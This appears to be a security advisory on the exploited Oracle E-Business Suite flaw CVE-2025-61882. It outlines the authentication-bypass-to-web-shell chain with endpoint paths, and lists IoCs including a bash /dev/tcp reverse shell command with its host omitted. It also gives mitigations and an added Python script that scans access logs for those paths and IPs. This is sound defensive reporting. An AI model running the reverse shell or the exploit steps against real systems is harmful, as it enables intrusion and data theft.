A critical zero-day vulnerability, identified as CVE-2025-61882, has been discovered in Oracle E-Business Suite (EBS) applications, leading to widespread exploitation by cybercriminals. This flaw allows unauthenticated remote code execution (RCE), enabling attackers to bypass authentication mechanisms, deploy web shells, and exfiltrate sensitive data from internet-exposed EBS instances.
Discovery and Initial Exploitation
The vulnerability was first observed on August 9, 2025. Security firm CrowdStrike has attributed the mass exploitation campaign to the threat actor known as GRACEFUL SPIDER, with indications that other malicious groups may also be involved. On September 29, 2025, GRACEFUL SPIDER allegedly sent emails branded with the Clop ransomware name to multiple organizations, claiming successful data theft from Oracle EBS applications.
Technical Details of the Exploit
The exploitation process begins with an HTTP POST request to the `/OA_HTML/SyncServlet` endpoint, which triggers the authentication bypass. Once authentication is bypassed, attackers use administrative account privileges within EBS to target the XML Publisher Template Manager. This involves sending GET and POST requests to `/OA_HTML/RF.jsp` and `/OA_HTML/OA.jsp` to upload a malicious XSLT template. Commands embedded in this template execute when the template is previewed, establishing an outbound Java process connection over port 443 to attacker-controlled infrastructure. This connection is typically used to load web shells, often through a two-step process:
1. Loading `FileUtils.java` to download a secondary backdoor named `Log4jConfigQpgsubFilter.java`.
2. Invoking the backdoor through a `doFilter` chain at the public endpoint `/OA_HTML/help/state/content/destination./navId.1/navvSetId.iHelp/`, enabling command execution and persistence.
Public Disclosure and Further Exploitation
Shortly after the public disclosure of a proof-of-concept (PoC) exploit on October 3, 2025, and Oracle’s subsequent patch release, a Telegram channel post suggested collaboration between threat actors SCATTERED SPIDER, SLIPPY SPIDER, and the ShinyHunters group. The post included a purported EBS exploit with the SHA-256 hash `76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d` and criticized GRACEFUL SPIDER’s tactics. Oracle’s advisory incorporated this PoC as an indicator of compromise (IoC), highlighting concerns over in-the-wild exploitation.
Indicators of Compromise (IoCs)
Organizations should be vigilant for the following IoCs associated with this exploitation:
– Malicious IP Addresses: 200[.]107[.]207[.]26 and 185[.]181[.]60[.]11, observed issuing the GET and POST requests described above.
– Reverse Shell Commands: Commands such as `sh -c /bin/bash -i >& /dev/tcp// 0>&1` (attacker host and port omitted here) used to establish outbound TCP connections for persistent access.
– Malicious Artifacts: Exploitation toolkit named `oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip` with SHA-256 hash `76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d`, containing Python scripts `exp.py` and `server.py`.
Mitigation Measures
To protect against this vulnerability, organizations are strongly advised to:
1. Apply Patches Promptly: Apply the patch Oracle released on October 4, 2025, immediately to address CVE-2025-61882.
2. Monitor Network Activity: Audit outbound connections for suspicious activity, particularly those involving Java processes connecting over port 443.
3. Review System Components: Examine the `xdo_templates_vl` view for unauthorized templates and investigate `icx_sessions` for anomalies involving UserID 0 and UserID 6.
4. Deploy Web Application Firewalls (WAFs): Protect exposed EBS services by implementing WAFs to filter and monitor HTTP requests.
5. Implement Endpoint Detection and Response (EDR): Deploy EDR agents on application servers and conduct behavioral analysis to detect anomalous child processes or unusual outbound traffic.
6. Limit Public Exposure: Restrict public access to Oracle EBS components. Where internet access is unavoidable, implement strict access control lists (ACLs) and network perimeter guidelines.
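Added example, not from the original article or any vendor tooling: a Python triage pass that applies the request-path chain and the source addresses from this write-up to constructed Common Log Format access log lines, in support of the monitoring step above. The function name `scan_access_log`, the stage labels and the sample lines are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Request paths from the chain above, numbered so sorted output follows the chain.
CHAIN_PATHS = {
    "/OA_HTML/SyncServlet": "1-auth-bypass",
    "/OA_HTML/RF.jsp": "2-template-manager",
    "/OA_HTML/OA.jsp": "2-template-manager",
    "/OA_HTML/help/state/content/destination./navId.1/navvSetId.iHelp/": "3-backdoor-endpoint",
}
# Source IPs from the IoC list (defanging brackets removed for matching).
BAD_IPS = {"200.107.207.26", "185.181.60.11"}
# Common Log Format: ip ident user [ts] "METHOD path proto" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

def scan_access_log(lines):
    """Return {source_ip: sorted stage labels} for sources worth triaging."""
    seen = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # blank or non-CLF line
        ip = m["ip"]
        path = m["path"].split("?", 1)[0]  # drop query string before lookup
        if ip in BAD_IPS:
            seen[ip].add("known-bad-ip")
        stage = CHAIN_PATHS.get(path)
        # The bypass is triggered by a POST; a GET to SyncServlet is not stage 1.
        if stage == "1-auth-bypass" and m["method"] != "POST":
            stage = None
        if stage:
            seen[ip].add(stage)
    # Flag a source that is on the IoC list, touched the backdoor path at all,
    # or touched two or more distinct chain stages from the same address.
    return {
        ip: sorted(s) for ip, s in seen.items()
        if "known-bad-ip" in s or "3-backdoor-endpoint" in s or len(s) >= 2
    }

# Constructed sample log: RFC 5737 test addresses plus one address from the IoC list.
SAMPLE_LOG = """\
203.0.113.7 - - [09/Aug/2025:03:12:01 +0000] "POST /OA_HTML/SyncServlet HTTP/1.1" 200 512
203.0.113.7 - - [09/Aug/2025:03:12:09 +0000] "GET /OA_HTML/RF.jsp?function_id=1 HTTP/1.1" 200 2048
203.0.113.7 - - [09/Aug/2025:03:13:40 +0000] "POST /OA_HTML/help/state/content/destination./navId.1/navvSetId.iHelp/ HTTP/1.1" 200 31
198.51.100.5 - - [09/Aug/2025:08:00:00 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 4096
200.107.207.26 - - [09/Aug/2025:09:30:00 +0000] "GET /OA_HTML/RF.jsp HTTP/1.1" 200 2048
"""
```

Run it as `scan_access_log(SAMPLE_LOG.splitlines())`; a real deployment would read the EBS web tier access logs and correlate the flagged addresses with `xdo_templates_vl` and `icx_sessions` findings.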
Conclusion
The exploitation of CVE-2025-61882 in Oracle E-Business Suite underscores the critical importance of timely patch management and proactive security measures. Organizations must remain vigilant, apply necessary patches without delay, and monitor their systems for signs of compromise to mitigate the risks associated with this vulnerability.